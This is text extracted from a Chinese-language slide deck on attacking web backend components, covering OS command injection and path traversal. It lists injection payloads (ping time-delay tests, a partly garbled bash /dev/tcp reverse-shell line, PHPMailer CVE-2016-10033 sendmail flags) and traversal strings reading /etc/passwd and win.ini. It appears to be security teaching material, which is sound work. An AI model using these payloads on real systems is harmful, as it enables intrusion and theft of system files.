攻击后端组件.pptx

攻击后端组件

攻击后端组件;操作系统:Linux/Windows;Web服务器内置的API与OS直接进行交互 PHP:exec() ASP:wscript.shell() JSP:Runtime.getRuntime().exec() Python: os.system()、popen() 用户可控制输入参数 程序员过滤不严格;字符;字符;基本时间延迟推断 【|| ping -c 30 || ping -n 30 】 输出回显测试 【ls;dir】 反弹shell测试 【bash?-i??/dev/tcp//8080?01】 提权 横向破坏 ;nslookup wget -o sendmail(CVE-2016-10033中,PHPMailer的RCE) -X logfile是记录log文件的,就是可以写文件; -C file是临时加载一个配置文件,就是可以读文件; -O option=value 是临时设置一个邮件存储的临时目录的配置。 ;路径遍历漏洞 /1/2/../../../../../../../etc/passwd /1/2/../../../../../../../windows/win.ini 确定攻击目标 路径 参数:file=../../../../../etc/passwd 文件上传/下载、说明文档、上传图像 基本测试 f=a/b.txt VS f=a/c/../b.

文档评论(0)

1亿VIP精品文档

相关文档